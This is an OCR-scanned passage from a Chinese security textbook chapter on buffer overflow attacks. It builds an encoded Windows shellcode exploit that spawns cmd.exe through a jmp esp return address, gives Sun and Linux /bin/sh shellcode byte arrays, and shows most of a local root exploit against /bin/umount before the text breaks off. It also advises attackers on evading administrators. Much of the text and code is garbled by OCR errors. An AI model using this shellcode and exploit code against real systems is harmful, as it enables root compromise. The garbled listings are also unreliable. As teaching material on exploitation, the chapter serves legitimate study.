AS UL. Windows 操作 系统 平台 为 实例 ,从 C 程序 的 局 部 变量 分 配 及 它 和 堆栈 的 天 系 、 
返回 地 址 和 堆栈 的 关系 、 局 部 变量 和 返回 地 址 ,以 及 堆栈 的 关系 开始 讨论 ,并 在 讲述 完 原 理 
后 进行 全 单 的 应 用 ,使 理论 和 应 用 相 结 合 。 通 过 对 下 面 内 容 的 学 习 , 可 以 让 读者 了 解 到 
Windows 更 加 撒 层 的 编程 技术 和 该 平台 下 缓冲 区 溢出 攻击 实现 的 原理 。 

第 一 步 , 了 解 Windows 下 存储 分 配 Ja ib PI T£ 2E tet .堆栈 和 男 数 调用 的 关系 。 

下 面 是 一 个 简单 的 字符 串 复 制 的 C 程序 。 


//test.c 

# include < stdio. h> 

# include < stdlib. h> 

# include < string. h> 

void overflow( void) 

{char buf[10]; 

strcpy(buf, "aaaaaaaaaa" ) ; 

} //end overflow 
int main( void) 

{overflow() ; 

return 0; 

} //end main 


在 Visual C++ 6.0 下 ,采用 “Step into” 调 试 模式 ,查看 该 程序 的 汇编 代码 段 如 下 : 


+ include < stdio. h> 
+ include < stdlib. h> 
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# include < string. h> 

void overflow( void) 

{ 

00401020 55 push ebp 

00401021 8B EC mov ebp, esp 

00401023 83 EC 4C sub esp, 4Ch 
00401026 53 push ebx 

00401027 56 push esi 

00401028 57 push edi 

00401029 8D 7D B4 lea edi, [ebp - 4Ch] 
0040102C B9 13 00 00 00 mov ecx, 13h 
00401031 B8 CC CC CC CC mov eax, OCCCCCCCCh 
00401036 F3 AB rep stos dword ptr [edi] 
char buf[ 10]; 





00401038 68 1C FO 41 00 push offset string "aaaaaaaaaa" (0041f01c) 
0040103D 8D 45 F4 lea eax, [ebp - OCh] 

00401040 50 push eax 

00401041 E8 6A 00 00 00 call strcpy (004010b0) 
00401046 83 C4 08 add esp, 8 

} //end overflow 
00401049 5F pop edi 

0040104A 5E pop esi 

0040104B 5B pop ebx 

0040104C 83 CA 4C add esp, 4Ch 

0040104F 3B EC cmp ebp, esp 

00401051 EB 4A 01 00 00 call  chkesp (004011a0) 
00401056 8B E5 mov esp, ebp 

00401058 5D pop ebp 

00401059 C3 ret 

int main( void) { 

00401070 55 push ebp 

00401071 8B EC mov ebp, esp 

00401073 83 EC 40 sub esp, 40h 

00401076 53 push ebx 

00401077 56 push esi 

00401078 57 push edi 

00401079 8D 7D CO lea edi, | ebp - 40h] 

0040107C B9 10 00 00 00 mov ecx, 10h 

00401081 B8 CC CC CC CC mov eax, OCCCCCCCCh 
00401086 F3 AB rep stos dword ptr [edi] 
overflow(); 

00401088 E8 7D FF FF FF call @ILT+ 5(overflow) (0040100a) 
return 0; 

0040108D 33 CO xor eax, eax 

} / / end main 
0040108F 5F pop edi 

00401090 5E pop esi 

00401091 5B pop ebx 

00401092 83 C4 40 add esp, 40h 
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00401095 3B EC cmp ebp, esp 

00401097 E8 04 01 00 00 call  chkesp (00401120) 
0040109C 8B E5 mov esp, ebp 

0040109E 5D pop ebp 

0040109F C3 ret 


通过 VC 集成 调试 环境 ,能 够 了 解 到 整个 程序 在 汇编 级 的 运行 流程 。 下 面 可 以 对 程序 
进行 少量 修改 ,使 其 成 为 一 个 有 缓冲 溢出 问题 的 程序 。 


//test.c 

# include < stdio. h> 

# include < stdlib. h> 

4 include < string. h> 

void overflow( void) 

{char buf[10]; 

strcpy(buf, "aaaaaaaaaabl234") ; bs 改 这 里 在 原来 的 10 个 'a' 后 再 加 "b1234" 
] / / end overflow 
int main(void) 

(overflow(); 

return 0; 

] / / end main 


HBT Sa FE» FE strcpy 处 设置 断 点 ,然后 无 错 运 行 到 断 点 处 ,切换 到 汇编 代码 窗 口 。 


00401020 55 push ebp 

00401021 8B EC mov ebp, esp 

00401023 83 EC 4C sub esp, 4Ch 

00401026 53 push ebx 

00401027 56 push esi 

00401028 57 push edi 

00401029 8D 7D B4 lea edi, [ ebp- 4Ch] 

0040102C B9 13 00 00 00 mov ecx, 13h 

00401031 B8 CC CC CC CC mov eax, OCCCCCCCCh 
00401036 F3 AB rep stos dword ptr [edi] 

char buf[10]; 

strcpy( buf, "aaaaaaaaaabl234"); //<= ----- 让 程序 停 在 这 里 
00401038 68 1C FO 41 00 push offset string "aaaaaaaaaab1234" (0041f01c) 
0040103D 8D 45 F4 lea eax, [ ebp - OCh] 

00401040 50 push eax 

00401041 E8 6A 00 00 00 call strcpy (004010b0) 
00401046 83 C4 08 add esp, 8 

] / / end overflow 
00401049 5F pop edi 

0040104A 5E pop esi 

0040104B 5B pop ebx 

0040104C 83 C4 4C add esp, 4Ch 

0040104F 3B EC cmp ebp, esp 

00401051 E8 4A 01 00 00 call _ chkesp (00401120) 
00401056 8B E5 mov esp, ebp 

00401058 5D pop ebp 

00401059 C3 ret 
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在 watch 窗口 加 入 ebp 和 buf, 并 在 memory 窗口 输入 “buf” 看 一 下 strcpy 图 数 执行 以 
前 的 堆栈 情况 ,选择 “Long Hex Format”, 可 以 看 到 当前 的 堆栈 情况 如 下 。 


0012FEE0 CCCCCCCC 

0012FF20 CCCCCCCC //<= ---- buf 的 起 始 地 址 (再 次 强调 ,不 同 机 器 上 运行 时 这 里 的 值 可 能 会 不 一 
FE),12 FA) FH 

0012FF24 CCCCCCCC 

0012FF28 CCCCCCCC 

0012FF2C 0012FF80 9 //<= --—- 老 的 ebp, 是 由 图 数 开始 处 的 push ebp 指令 填 人 的 

0012FF30 0040108D  //«- ---- 函数 返回 地 址 即 main 函数 中 call overflow 指令 下 的 指令 地 址 


Tz F10 键 耳 至 执行 完 call strcpy 再 看 一 下 memory 窗口 红色 的 部 分 ,选择 “Byte 
Format”, 从 buf 的 起 始 地 址 开始 被 十 人 了 10 个 0x61(0'a ,一 个 0x62('b')、0x31('1')、0x32 
(20 ,0x33C39) ,0x34C4 0 ,以 及 一 个 0x00, 可 以 看 到 “ 老 的 ebp” 内 容 已 经 被 改变 了 。 


0012FEE0 CCCCCCCC 
0012FF20 61 61 61 61 aaaa //<= ---- buf 的 起 始 地 址 , 内容 已 经 改变 
0012FF24 61 61 61 61 aaaa 

0012FF28 61 61 62 31 aabl //<= ---- JER 

0012FF2C 32 33 34 00 234. //<= ---- BW ebp 内 容 已 经 被 改变 
0012FF30 8D 10 40 00 ..@. //<= ---- 图 数 返 回 地 址 未 变 


从 堆栈 窗口 可 以 看 到 ,'"b' 和 ?1' 将 buf 的 12 个 可 用 字 节 的 最 后 两 个 字 节 填充 了 ,而 后 面 
的 '2 '3', 4 和 0x00 作为 一 个 dword 修改 了 ebp 的 值 , 再 下 面 一 个 dword 就 是 函数 返回 地 
ht , 冉 按 F10 键 执 行 ,程序 可 以 正 第 返回 main, 如 果 上 青 修改 后 面 的 dword 值 , 那 么 图 数 的 返 
回 地 址 就 会 变 成 所 修改 的 返回 值 。 所 以 能 够 利用 地 址 覆盖 , 跳 转 并 执行 任意 代码 。 

下 面 写 一 个 程序 使 程序 开启 一 个 cmd. exe。 首 先 要 完成 一 些 基 本 动态 链接 库 的 调用 。 
首先 用 LoadLibrary C "msvcrt. dll") 48 z VC 运行 时 库 (Runtime Library); 然后 用 
GetProcAddress("system") 获 得 system 图 数 起 址 ; 最 后 用 system("cmd. exe") FJS cmd. 
exe 命令 控制 合 。 


程序 如 下 : 


# include < stdio. h> 

void main( void) 

{ 

| asm 

{ // 在 这 里 模拟 出 一 个 函数 体内 的 程序 结构 ,可 以 自己 分 配 空间 来 存储 "msvert. d11", " system", 
"cmd. exe" //3 ^-*E TI 8 

push ebp 

push ecx 

push edx 

mov ebp, esp 

sub esp, 20h // ^y WC 32(0x20) 个 字 节 就 已 经 够 用 了 
XOr ecx, ecx 


/ XOROXUCUOKCRCKCKOCOUOKOUOKOKOKCOKOKUKEUKCRCKCOKCOKOCOKOKOUKCUKCKCORUOKUKURKOKCOKCOKUKEUKUKUKUK / 
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/ /调用 LoadLibrary AA X msvcrt.dll 
mov byte ptr [ebp - Obh], 'n' 
mov byte ptr [ebp - Oah], 's' 
mov byte ptr [ebp - 09h], 'v' 
mov byte ptr [ebp - 08h], 'c' 
mov byte ptr [ebp - 07h], 'r' 
mov byte ptr [ebp - 06h], 't' 
mov byte ptr [ebp- 05h], '.' 
mov byte ptr [ebp - 04h], 'd' 
mov byte ptr [ebp - 03h], '1' 
mov byte ptr [ebp - 02h], '1' 
mov byte ptr [ebp- 01h],0 
lea eax, | ebp - Obh] 








push eax 

mov ecx, 77e6a254h; / / Fl depends 获得 的 LoadLibrary PR Zi Hh HE 
call ecx 

mov edx, eax // 保 存 装 载 后 msvert. dll 在 内 存 中 的 起 始 地 址 


/ /调用 GetProcAddress 取得 system 图 数 起 址 

mov byte ptr [ebp - Obh], 's' 

mov byte ptr [ebp - Oah], 'y' 

mov byte ptr [ebp - 09h], 's' 

mov byte ptr [| ebp - 08h], 't' 

mov byte ptr [ebp - 07h], 'e' 

mov byte ptr [ebp - 06h], 'n' 

mov byte ptr [ebp - 05h],0 

lea eax, [ebp - Obh] 








push eax 

push edx 

mov ecx, 77e69aclh; / / IR] E FH depends 获得 的 

call ecx 

mov edx, eax // 保 存 已 经 获得 的 system 函数 在 内 存 中 的 起 始 地 址 


// 调 用 system 开启 cmd 环境 
mov byte ptr [ebp - Obh], 'c' 
mov byte ptr [ebp - Oah], 'm' 
mov byte ptr [ebp - 09h], 'd' 
mov byte ptr [ebp - 08h], '. ' 
mov byte ptr [ebp - 07h], 'e' 
mov byte ptr [ebp - 06h], 'x' 
mov byte ptr [| ebp - 05h], 'e' 
mov byte ptr [ebp - 04h],0 
lea eax, [ebp — Obh] 
push eax 
call edx 
add esp, 4; 





lí KEKEEKEFKKKKKKEKKEKKRKKRKKKSEEKEKKKEKRKEKE / 
mov esp, ebp 

pop edx 

pop ecx 

pop ebp 

}} 
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编 详 、 运 行 得 到 命令 控制 台 , 调 入 Step Into 调试 模式 ,选择 Disassembly 和 Code Bytes 
得 到 的 计算 机 代码 如 下 。 


char code[ ] = "\x55\x51\x52\x8B\xEC\x83\xEC\x20\x33\xC9" 
"\xC6\x45\xF5\x6D\xC6\x45\xF6\x73\xC6\x45" 

"\ xF7\x76\xC6\x45\xF8\x63\xC6\x45\xF9\x72" 
"\xC6\x45\xFA\x74\xC6\x45\xFB\x2E\xC6\x45" 

"\ xFC\x64\xC6\x45\xFD\x6C\xC6\x45\xFE\x6C" 
"\xC6\x45\xFF\x00\x8D\x45\xF5\x50\xB9\x54" //<= ---- 注 意 : 第 一 个 0x00 
"\ xA2\xE6\x77\xFF\xD1\x8B\xD0\xC6\x45\xF5" 
"\x73\xC6\x45\xF6\x79\xC6\x45\xF7\x73\xC6" 
"\x45\xF8\x74\xC6\x45\xF9\x65\xC6\x45\xFA" 

"\ x6D\xC6\x45\xFB\x00\x8D\x45\xF5\x50\x52" //<= ---- 88 —^ 0x00 
"\ xB9\xC1\x9A\xE6\x77\xFF\xD1\x8B\xD0\xC6" 
"\x45\xF5\x63\xC6\x45\xF6\x6D\xC6\x45\xF7" 
"\x64\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6" 
"\x45\xFA\x78\xC6\x45\xFB\x65\xC6\x45\xFC" 
"\x00\x8D\x45\xF5\x50\xFF\xD2\x83\xC4\x04" //<= ———— B= 0x00 
"\ x8B\xE5\x5A\x59\x5D" 


前 10 4a HI 2 A'b YE HA. IR] 4 A dddd # m ebp,xxxx YW jmp esp 指令 的 内 存 地 
址 ,后面 的 cceccecce- 2E Ef dX AS TS BY PE ll a EE eZ ae hg SY LS 

M EAE EB dui HHA overflow HY ret LE eip 王 xxxx( 执 行 jmp esp), ix FT. esp 指 回 命令 控制 
台 程 序 起 址 ,这 样 就 让 原本 应 该 回 到 主 函 数 继 续 执 行 的 程序 流程 改变 去 执行 改写 后 的 代码 
了 ,这 里 为 了 防止 字符 串 的 截断 ,所 以 Shellcode 必须 经 过 编码 后 进行 异 或 处 理 , 并 在 溢出 后 
动态 解码 ,这 就 需要 一 段 解码 程序 加 在 Shellcode 前 面 ,溢出 后 它 将 首先 被 执行 。 

先 将 code 编码 成 以 下 代码 : 


"\x55\x51\x52\x8B\xEC\x83\xEC\x20\x33\xC9" 

"\ xC6\x45\xF5\x6D\xC6\x45\xF6\x73\xC6\x45" 

"\ xF7\x76\xC6\x45\xF8\x63\xC6\x45\xF9\x72" 

"\xC6\x45\xFA\x74\xC6\x45\xFB\x2E\xC6\x45" 

"\ xFC\x64\xC6\x45\xFD\x6C\xC6\x45\xFE\x6C" 

"\xC6\x45\xFF\x99\x8D\x45\xF5\x50\xB9\x54" //<= ---- 第 一 个 编码 后 的 0x99, 请 比较 未 编码 
前 的 相应 位 置 的 值 

"\ xA2\xE6\x77\xFF\xD1\x8B\xD0\xC6\x45\xF5" 

"\x73\xC6\x45\xF6\x79\xC6\x45\xF7\x73\xC6" 

"\x45\xF8\x74\xC6\x45\xF9\x65\xC6\x45\xFA" 

"\ x6D\xC6\x45\xFB\x99\x8D\x45\xF5\x50\x52" //<= ---- 第 二 个 编码 后 的 0x99 

"\xB9\xC1\x9A\xE6\x77\xFF\xD1\x8B\xD0\xC6" 

"\x45\xF5\x63\xC6\x45\xF6\x6D\xC6\x45\xF7" 

"\x64\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6" 

"\x45\xFA\x78\xC6\x45\xFB\x65\xC6\x45\xFC" 

"\x99\x8D\x45\xF5\x50\xFF\xD2\x83\xC4\x04" //<= ---- 第 三 个 编码 后 的 0x99 

"\x8B\xE5\x5A\x59\x5D"; 
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is ETE DA ELA PETRUS ERE: 


asm 


{mov eax, esp; // 这 是 溢出 后 执行 jmp esp 后 执行 的 第 一 条 指令 ,esp 指向 当前 指令 地 址 ,意义 是 
//" 获 得 解码 程序 起 址 " 

add eax, 44h; // 这 个 解码 子 程序 有 20 个 字 节 (解码 程序 起 址 + 20 = code 起 址 ,再 加 上 53 fi f? ) 
// 使 eax 指向 第 一 个 编码 过 的 0x99 

xor [eax],99h ”// 解 码 第 一 个 0x99, 这 个 操作 的 意义 是 "0x99 异 或 0x99 = 0x00", 即 还 原 成 0x00 

add eax, 28h // 指 回 第 95 fu Te 

xor [eax],99h // 解 码 第 二 个 0x99 

add eax, 2eh // 指 向 第 140 偏 移 

xor [eax], 99h // 解 码 第 三 个 0x99 

} 


jmp esp 指令 地 址 是 通过 下 面 这 个 简单 的 程序 找到 的 ,请 参考 backend 的 相关 资料 。 


# include "stdafx. h" 

# include "find. h" 

# ifdef DEBUG 

# define new DEBUG NEW 

# undef THIS FILE 

static char THIS FILE[] = _ FILE ; 

# endif 

// The one and only application object 

CWinApp theApp; 

using namespace std; 

int tmain(int argc, TCHAR* argv[], TCHAR* envpl]) 
( int nRetCode = 0; 

// initialize MFC and print and error on failure 

if (! Af£xWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0)) 
( // TODO: change error code to suit your needs 

cerr «« T("Fatal Error: MFC initialization failed") «« endl; 
nRetCode = 1; 

} 

else 

{ #if 0 

return 0; 


| asm jmp esp 


# else 

bool we_loaded_it = false; 

HINSTANCE h; 

TCHAR dllname[] =  T("msvcrt"); 

h = GetModuleHandle(dllname) ; 

if(h == NULL) 

{ h = LoadLibrary(dllname); 

if(h == NULL) 

{ cout <<"ERROR LOADING DLL: "<< dllname << endl; 
return 1; 


} 
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we loaded it = true; 

} 

BYTE* ptr = (BYTE* )h; 

bool done = false; 

for(int y = 0;!done;yt+) 

{ 

try 

{ if(ptr[y] == OxFF && ptr[y+1] == 0xE4) 

{ int pos = (int)ptr + y; 

cout ««"OPCODE found at 0x"<< hex << pos << endl; 
[ar 

catch(...) 

{ cout <<"END OF "<< dllname <<" MEMORY REACHED"<< endl; 
done = true; } 

} 

if(we loaded it) FreeLibrary(h) ; 

# endif } 

return nRetCode; 


} 


在 计算 机 上 找到 的 jmp esp 代码 在 0x78024e02 地 址 处 ,这样 就 已 经 收集 所 有 的 信息 ， 
包括 溢出 点 、jmp esp 代码 地 址 、 经 过 编码 的 ShellCode 和 解码 ShellCode 的 子 程序 。 
Shellcode- lai h ^£ $ +-jmp esp 十 解码 子 程序 十 code( 编 码 后 的 ) ,得 到 以 下 代码 : 


i include < stdio. h> 

4 include < stdlib. h> 

# include < string. h> 

4 include < windows. h > 

char xcode[ ] = "aaaaaaaaaabbdddd" 

"\x02\x4e\x02\x78" //jmp esp 代码 地 址 ,不 同 计 算 机 的 动态 链接 库 版 本 可 能 不 一 样 
"\ x8B\xC4\x83\xC0\x49\x80\x30\x99\x83\xCo" // 解 码 子 程序 
"\x29\x80\x30\x99\x83\xC0\x2e\x80\x30\x99" 
"\x55\x51\x52\x8B\xEC\x83\xEC\x20\x33\xC9" // 开 启 cmd. exe 的 程序 (code) 
"\xC6\x45\xF5\x6D\xC6\x45\xF6\x73\xC6\x45" 

"\ xF7\x76\xC6\x45\xF8\x63\xC6\x45\xF9\x72" 
"\xC6\x45\xFA\x74\xC6\x45\xFB\x2E\xC6\x45" 

"\ xFC\x64\xC6\x45\xFD\x6C\xC6\x45\xFE\x6C" 
"\xC6\x45\xFF\x99\x8D\x45\xF5\x50\xB9\x54" 

"\ xA2\xE6\x77\xFF\xD1\x8B\xD0\xC6\x45\xF5" 
"\x73\xC6\x45\xF6\x79\xC6\x45\xF7\x73\xC6" 
"\x45\xF8\x74\xC6\x45\xF9\x65\xC6\x45\xFA" 
"\x6D\xC6\x45\xFB\x99\x8D\x45\xF5\x50\x52" 
"\xB9\xC1\x9A\xE6\x77\xFF\xD1\x8B\xD0\xC6" 

"\ x45\xF5\x63\xC6\x45\xF6\x6D\xC6\x45\xF7" 
"\x64\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6" 

"\ x45\xFA\x78\xC6\x45\xFB\x65\xC6\x45\xFC" 
"\x99\x8D\x45\xF5\x50\xFF\xD2\x83\xC4\x04" 
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"\ x8B\xE5\x5A\x59\x5D"; 


void overflow( void) 

{ 

char buf[10]; 

strcpy(buf, xcode) ; // RAFU jag HH i al 
}//end overflow 


int main( void) 


{ 

LoadLibrary("msvcrt.d1ll");  // 模 拟 受 攻击 应 用 程序 引入 的 msvcrt.dl1( 这 里 只 是 模拟 ,有 些 漏 洞 
// 程 序 并 不 引 人 这 个 库 ) 

overflow(); 

return 0; 

} //end main 


上 述 程 序 在 Windows 2000 Pro 5. 00. 2195 SP2 F.H VC++ 6.0 编译 .调试 .运行 通过 。 
8.4.2 缓冲 区 攻击 实例 For UNIX 


假设 攻击 者 已 经 拥有 目标 系统 的 一 个 账号 ,已 知 某 个 属于 ROOT 且 有 设置 用 户 权 限 的 
应 用 程序 有 缓冲 区 溢出 漏洞 ,那么 如 何 编写 缓 神 区 攻击 程序 呢 ? 首先 攻击 者 需要 一 个 比较 
大 的 字符 串 ,这 个 字符 串 的 任务 是 ,将 它 复 制 到 缓冲 区 中 时 ,能 够 把 攻击 者 想 执 行 的 代码 复 
制 到 缓冲 区 中 ,并 且 让 缓冲 区 溢出 ,用 缓冲 区 的 地 址 履 兰 堆栈 中 的 返回 地 址 。 

可 以 如 下 定义 这 个 字符 串 。 


char * buff = NULL; 
buff = malloc(4096); 
if(!buff) 
( printf("can't allocate memory An"); 
exit(0); 
} 


然后 ,为 buff 字符 串 分 配 4096 个 字 节 的 空间 ,如 果 系 统 不 能 分 配 这 么 大 的 空间 ,程序 
退出 ,改换 一 个 小 一 些 的 空间 。 用 两 个 辅助 指针 addr_ptr 和 ptr 同时 指向 这 个 字符 串 buff, 
定义 如 下 。 


long * addr ptr; 
char * ptr; 


这 两 个 指针 虽然 都 指 癌 buff. fHZ& addr. ptr 是 long 型 指针 ,ptr 是 char WHS £F. ALA 
为 什么 要 用 两 种 类 型 的 指针 呢 ? 解释 如 下 。 

最 重要 的 任务 是 编写 shell 汇编 级 代码。 要 想 利 用 缓冲 区 溢出 汤 洞 对 系统 进行 攻击 , 必 
须 在 缓冲 区 中 放 入 一 些 可 执行 代码 。 通 常 ,攻击 者 想 获得 一 个 具有 root 权限 的 shell, —fi 
Ifi] zi ,希望 shell 代 人 码 能 够 尽量 短小 ,因为 每 个 应 用 程序 的 组 冲 区 大 小 不 一 样 , 大 的 缓冲 区 可 
能 有 几 干 个 字 市 ,小 的 缓冲 区 只 有 几 十 个 字 古 ,尽量 小 的 shell 代码 可 以 满足 尽量 小 的 缓冲 
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区 。 在 这 上 段 代 码 的 前 段 ,是 对 一 些 环境 变量 进行 保存 ,后 段 调用 shell. 
在 选择 shell 时 ,一 般 不 直接 调用 /bin/sh ,而 是 在 月 己 的 目录 下 备份 一 个 shell。 为 此 用 
以 下 命令 ， 


cp /bin/sh /home/attack/sh (/home/shenfei 是 自己 的 工作 目录 ) 


攻击 者 可 以 调用 备份 的 shell. BB FH/home/attack/sh 这 个 shell, 系 统 会 把 这 些 行为 定 
位 到 一 个 新 的 日 志文 件 ,系统 官 理 员 很 难 发 现 攻击 者 已 经 利用 缓冲 区 灌 出 着 洞 获 得 了 root 
权限 。 

Sun 和 Linux 系统 的 汇编 指令 集 不 同 。 所 以 它们 的 shell 汇编 代码 要 分 别 写 。 下 面 给 
出 两 个 shell 汇编 代码 ,一 个 用 于 Sun Solaris 系统 ,万 外 一 个 用 于 Linux 系统 。 

(1) shell 汇编 代码 for Sun Solaris 如 下 。 


mov ecx, esp 

XOr eax, eax 

push eax 

lea ebx,[esp- 7] 
add esp, 12 

push eax 

push ebx 

mov edx, ecx 

mov al,11 

int 0x80 

string \"/home/attack/sh\" 


(2) shell 汇编 代码 for Linux Wh F. 


jmp Oxlf 

popl % esi 

movl % esi,0x8( % esi) 
xorl % eax, $ eax 

movb % eax, 0x7( % esi) 
movl $% eax, 0Oxc( % esi) 
movb $0xb, $al 

movl % esi, % ebx 

leal 0x8( % esi), $ ecx 
leal Oxc( % esi), $ edx 
int $ 0x80 

xorl % ebx, % ebx 

movl % ebx, % eax 

inc % eax 

int $ 0x80 

call - 0x24 

string \"/home/shenfei/sh\" 





一 般 而 言 , 为 了 保证 shell 执行 的 速度 «JI 1E RAR IL 28 Ver A 881 VE JD Li OS DCN 26 D 
中 。 下 面 是 应 用 于 Sun UNIX 和 Linix 两 种 UNIX 系统 的 shell 机 器 码 程 序 。 
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(1) 用 于 Sun 系统 的 shell HLF 43 f£ Fr. 


u char sun shellcode[] - 
"\xc0\x13\x2d\x0b\xd8\x9a\xac\x15\xal\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" 
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1la\x80\x0a\x9c\x03\xa0\x14" 

"\ xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" 

"\ x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" 
"\x91\xd0"/ + \x20\x08" * / 


(2) 用 于 Lunix 系统 的 shell HL4 13 f£ FF . 


u char lunix shellcode[] = 

"\ xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0£" 
"\ xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" 
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; 


5 sé shell 代码 后 ,攻击 者 往 buff 字符 串 中 填 人 数据 ,这 个 数据 应 该 包括 3 个 部 分 : 
NOP 填充 .shell 代码 填充 ,缓冲 区 地 址 填充 。 

(1) NOP 填充 。 这 时 攻击 者 面临 的 困难 是 ,即使 知道 某 个 程序 存在 缓冲 区 洲 出 的 缺 
陷 ,那么 如 何 知 着 缓冲 区 的 地 址 来 存放 shell 代码 呢 ?” 理 论 上 讲 , 每 个 程序 堆栈 的 起 始 位 置 
固定 ,所 以 能 够 通过 反复 实验 缓冲 区 与 堆栈 起 始 位 置 的 距离 ,从 而 得 到 缓冲 区 位 置 。 但 这 种 
猜测 可 能 要 进行 成 和 上 万 次 ,不 现实 。 解 决 办 法 是 采用 空 指 令 NOP(0x90)。 在 shell 代码 
之 前 放 一 长 串 NOP, 将 返回 地 址 指向 NOP 的 任 一 位 置 ,那么 执行 冠 NOP 指令 后 ,程序 将 会 
激活 shell 进程 ,就 大 大 增加 猜 中 概率 ,所 以 在 buff 的 开始 部 分 ,填充 的 是 NOP(0x90)。 一 
般 来 说 ,缓冲 区 中 ,除了 shell 代码 外 ,其 余 的 空间 都 可 以 用 来 填充 NOP。 如 图 8-11 Prax. N 
代表 Nop. S 代表 Shell, 


ZB buffer 局 部 变量 《返回 地 址 
~=---[  ] [NNNNNNNSSSSSSSSSSSSSSSSS] [ ] | [oce 


图 8-11 在 缓冲 区 中 填充 NOP 
这 段 填充 代码 如 下 。 
memset(ptr, 0x90, BUFFER SIZE— strlen(execshell)); 


BUFFER SIZE 是 一 个 稼 量 ,是 缓冲 区 的 长 度 ,调用 图 数 strlen(execshell) 求 得 shell fX 
码 的 长 度 , 这 样 就 将 NOP 填 进 buff 的 前 一 段 。 

(2) 填充 shell 代码 , 绥 冲 区 剩 下 的 空间 都 用 来 填写 shell 代码 ,用 字符 串 execshell 表示 
shell 代码 ,填写 shell 代码 的 程序 如 下 。 

ptr += BUFFER SIZE- strlen(execshell); 


for(i=0;1i< strlen(execshell);i++) 
* (ptr++) = execshell[i]; 
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(3) 填充 缓冲 区 的 地 址 。 首 和 对 应 当 获 得 应 用 程序 堆栈 的 起 始 位 置 ,可 以 在 C 程序 中 氏 
航 一 个 汇编 指令 实现 。 在 CC 语言 中 输入 ”_ asm ”可 以 甬 人 汇编 指令 ,也 可 以 用 一 个 专门 
的 图 数 完 成 这 个 功能 。 


/* SunSolaris: */ 
u long get esp() 

{ 

. asm (" mov $% sp, %1i0"); 

} 
/* UNIX 系统 : */ 
u long get esp() 

{ 

. asm ("movl $% esp, % eax"); 


} 


得 到 堆栈 起 始 位 置 以 后 ,把 这 个 地 址 加 上 一 个 侦 移 驶 得 到 缓冲 区 的 地 址 。 最 终 得 到 的 
地 址 就 是 最 后 用 来 填充 buff 的 数据 。 代 码 如 下 。 


addr ptr = (long * )ptr; 
for(i=0;i< ((4096 - BUFFER SIZE) /4); i-*) 
x (addr ptr**) = get esp() + ofs; 


ptr 指针 是 字符 型 指针 ,每 个 字符 型 变量 占用 系统 一 个 字 节 的 空间 。 但 是 ,填充 缓冲 区 
地 址 是 long 型 的 ,这 要 求 ptr 十 十 操作 以 4 个 字 节 为 单位 。 图 数 ptr 十 十 执行 的 结果 是 将 ptr 
指针 加 后 移 一 个 字 节 ,不 符合 要 求 。 将 ptr 指针 强制 转换 为 long 型 指针 addr_ptr。addr_ 
ptr 十 十 执行 的 结果 是 指针 癌 后 移 4 个 字 节 ,恰巧 是 一 个 地 址 所 占 的 空间 。 这 就 是 为 什么 用 
两 个 类 型 的 指针 同时 指 问 buff 的 原因 。 

最 后 ,以 buff 为 参数 调用 具有 缓冲 区 溢出 漏洞 的 应 用 程序 ,调用 代码 如 下 。 


execl(PATH, "应 用 程序 "，buff，NULL ) ; 


当 用 buff 中 的 数据 填充 应 用 程序 的 缓冲 区 时 ,首先 在 缓冲 区 中 写 人 NOP 和 shell 代 
码 ,然后 缓冲 区 溢出 ,在 返回 地 址 处 写 入 缓冲 区 地 址 。 程 序 返回 时 ,会 执行 shell 代码 ,获得 
shell 权限 。 


8.4.3 缓冲 区 攻击 实例 For Linux 


在 执行 这 个 程序 时 ,是 以 超级 用 户 的 号 份 进行 操 作 的 。 该 程序 在 对 缓 神 区 的 边界 进行 检查 
时 存在 隐患 ,本 地 用 户 可 以 通过 缓冲 区 洲 出 取得 root 权限 。 


# include < unistd. h> 

# include < stdio. h> 

# include < stdlib. h> 

# include < fcntl.h» 

# include < sys/stat. h> 
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井 define PATH MOUNT "/bin/umount" 
/ * 定义 mount 程序 的 路 径 , 用 以 调用 mount 程序 */ 
# define BUFFER SIZE 1024 
/ * mount 程序 缓冲 区 的 大 小 是 1024 个 字 节 x*/ 
+ define DEFAULT OFFSET 50 
/* 假 定 的 缓冲 区 相对 于 堆栈 起 始 位 置 的 偏 移 , 如 果 结 果 不 正 确 , 重 新 设置 */ 
/#* 征 位 堆栈 起 始 位 置 */ 
u long get esp() 
{ asm ("movl %esp, % eax"); 
} 
main(int argc, char ** argv) 
{ u_char execshell[] = 
"\ xeb\x24\x5e\x8d\xle\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0£" 
"\ xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" 
"\ x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; 
/ * 用 于 Linux 系统 的 shell 机 器 代码 </ 
char * buff = NULL; 
/ * 用 来 制造 缓冲 区 溢出 的 大 字符 串 , 初 始 值 置 为 NOLL* / 
unsigned long * addr ptr = NULL; 
/ * 用 来 指向 buff 的 辅助 指针 1 * / 
char * ptr = NULL; 
/ * 用 来 指向 buff 的 辅助 指针 2.46 buff 中 写 人 字符 型 变量 时 ,用 ptr 指针 , 4 buff 中 写 人 整 
型 变量 时 ,用 addr_ptr 指针 * / 
int i; 
int ofs = DEFAULT OFFSET; 
/ * 缓冲 区 相对 于 堆栈 起 始 位 置 的 距离 保存 在 变量 ofs 中 */ 
/ * 如 果 不 能 分 配 4096 字 节 大 小 的 地 址 ,无 法 进行 攻击 ,程序 退出 x*/ 
buff = malloc(4096); 
if(!buff) 
{ printf("can't allocate memory\n") ; 
exit(0); 
} 
ptr = buff; 
/ * 辅助 指针 指向 buff * / 
memset(ptr, 0x90, BUFFER SIZE - strlen(execshell)); 
/ * 填充 NOP * / 
ptr += BUFFER SIZE - strlen(execshell); 
